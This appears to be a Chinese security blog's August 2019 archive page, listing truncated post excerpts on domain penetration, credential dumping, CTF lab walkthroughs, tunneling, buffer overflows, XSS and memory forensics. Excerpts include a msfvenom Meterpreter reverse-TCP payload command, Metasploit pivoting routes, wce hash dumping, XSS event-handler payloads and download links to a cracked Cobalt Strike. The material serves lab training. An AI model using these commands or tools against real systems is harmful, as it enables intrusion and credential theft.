08 2019 档案
摘要:简介: 微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。 微软官方文档:https://docs.microsoft.com/en-us/prev
阅读全文
摘要:实验环境: kali 主机:192.168.88.193 目标靶机:win2008 R2 192.168.88.130 kali 主机上执行生成一个后门 exe: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPO
阅读全文
摘要:Cobalt_Strike3.14下载: https://download.csdn.net/download/weixin_41082546/11604021 https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/blu
阅读全文
摘要:MSF 下域内渗透实战 先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255.
阅读全文
摘要:Kerberos认证工作原理 https://www.cnblogs.com/huamingao/p/7267423.html 5.获取访问活动目录数据库文件的权限(ntds.dit) 前提条件是获取域控权限: 1.通过备份路径(备份服务器储存,媒体,网络共享) 2 在准备配置成域控的服务器上找 N
阅读全文
摘要:pass the ticket 在域环境中,Kerberos协议被用来作身份认证,这里仅介绍几个名词: KDC(Key Distribution Center): 密钥分发中心,里面包含两个服务:AS和TGS AS(Authentication Server): 身份认证服务 TGS(Ticket
阅读全文
摘要:1、抓取域 hash 密码vsssown.vbs、vshadow.exe、ntdsdump.exe、 mimikatz 等2、hash 注入wce 直接获取到域登录的 hash 值:wce.exe >hash...
阅读全文
摘要:一、域渗透基础1.域控:win server 20082.域内DC:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp1.域渗透基本命...
阅读全文
摘要:项目地址:https://github.com/fatedier/frp/releases 下载对应版本程序 wget https://github.com/fatedier/frp/releases/download/v0.27.0/frp_0.27.0_linux_amd64.tar.gz 解压
阅读全文
摘要:0x00 简介 1.域控:win server 2008 2.域内服务器:win server 2008、win server 2003 3.域内PC:win7 x64、win7 x32、win xp 0x01.配置静态IP 查看IP地址和网关 DNS为127.0.0.1,域控安装过程中会默认安装D
阅读全文
摘要:靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip XXE注入工具下载: https://download.csdn.net/download/weixin_41082546/11609927 CTFCrackTools解码工具: https://do
阅读全文
摘要:COBAIT STRIKE 3.14破解版: https://download.csdn.net/download/weixin_41082546/11604021 客户端攻击重定向设置 view —application 查看目标系统日志 attack—web-drive-by—site clon
阅读全文
摘要:0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/rave
阅读全文
摘要:靶场下载链接:Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com...
阅读全文
摘要:勒索病毒应急处置流程 1.事件状态判断 了解现状,了解发病时间,了解系统架构 确认被感染主机范围 2.临时处置 已感染主机:进行网络隔离,禁止使用U盘、移动银盘等移动存储设备 未感染主机:ACL隔离、关闭ssh、rdp等协议,禁止使用U盘、移动硬盘。 3.信息收集分析 样本获取 windows: 文
阅读全文
摘要:原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。 工具: 调试工具:edb; ###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势 实验对象:crossfire【多人在线RPG游戏】 运行平台:Kali i386 虚拟机【32位,计算机C
阅读全文
摘要:一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server
阅读全文
摘要:简介 Conky 是一个应用于桌面环境的系统监视软件,可以在桌面上监控系统运行状态、网络状态等一系列参数 https://github.com/brndnmtthws/conky/ 详细配置文档:http://conky.sourceforge.net/docs.html 简洁的用户界面; 高度可配
阅读全文
摘要:知识点: 倘若是在script、input标签当中,即可突破。 Payload ' oninput=alert`1` // 当要在input中输入内容时触发事件 ' oninput=alert`1` ' 同上 ' onchange=alert`1` // 发生改变的时候触发该事件 ' onchang
阅读全文
摘要:在渗透测试过程中,很多时候我们需要反弹一个shell回来。使用empire也好,MSF也好,其他工具也好,都避不开公网IP的问题。这时候我们就需要一个VPS来进一步进行渗透测试。 建立通道连接的方式有很多种,比如NAT映射、ssh隧道等各种方式,这里我们就不探讨了。 建立通道的不稳定性很高,容易断开
阅读全文
摘要:电子取证的基本概念 科学的运用提取和证明方法,对于从电子数据源提取的证据保护(preservation)、收集(collection)、验证(validation)、鉴定(identification)、分析(analysis)、解释(interpetation)、存档(documentation)
阅读全文
摘要:启动一个文本文件 tasklist 查看进程列表 可以看到notepad.exe正在后台运行 procdump -ma notepad.exe notepad.dmp -m memory -a all 意思就是将和notepad.exe程序有关的所有内存dump下来保存为.dmp文件 当前目录下生成
阅读全文
摘要:电子取证 使用dumpit工具将计算机内存镜像保存。并生成raw文件格式文件。 检测镜像文件基本信息 volatility -f 2008.raw imageinfo 检测进程列表及物理内存位置 volatility -f 2008.raw --profile=Win2008R2SP1x64 psl
阅读全文
摘要:SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392.html 提权辅助工具LinEnum下载:https://download.csdn.net/dow
阅读全文
摘要:droopyCTF https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm CTF镜像合集:https://www.vulnhub.com/?page=18 参考:https://www.hackingarticles.in/hack-droo
阅读全文
摘要:BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/
阅读全文
摘要:原文地址:https://www.payload.com.cn/ basic-pentesting-1 下载地址: https://www.vulnhub.com/entry/basic-pentesting-1,216/ 提权辅助工具LinEnum下载:https://download.csdn.
阅读全文
摘要:靶场下载链接: Download: http://www.five86.com/downloads/DC-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip Download (Torrent): https://dow
阅读全文
摘要:靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://dow
阅读全文
摘要:basic-pentesting-1https://www.vulnhub.com/entry/basic-pentesting-1,216/获取ip地址端口扫描,服务识别根据服务版本搜索相关漏洞通过查看漏洞利...
阅读全文
摘要:SickOs:1.2https://www.vulnhub.com/entry/sickos-12,144/首先获取目标ip地址,并探测端口netdiscover -i eth0 -r 192.168.88.1...
阅读全文
摘要:BTRSys 2.1https://www.vulnhub.com/entry/btrsys-v21,196/1.确定目标ip2.端口和服务探测根据vsftp版本没有找到相关漏洞利用代码然后我们转战web查看页...
阅读全文
摘要:droopyCTFhttps://www.vulnhub.com/?q=droopy&sort=date-des&type=vmCTF镜像合集:https://www.vulnhub.com/?page=18参...
阅读全文
摘要:开启windows 功能选中 适用于linux 的windows 子系统打开Microsoft store,安装kali 系统系统安装完成之后,通过apt-get install kali-linux-full ...
阅读全文
摘要:1. mitmf注入xss即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码如果中间人发生在运营商线路上,很难引起用户注意曾经号称最好用的中间人攻击工具安装依赖apt-get install p...
阅读全文

浙公网安备 33010602011771号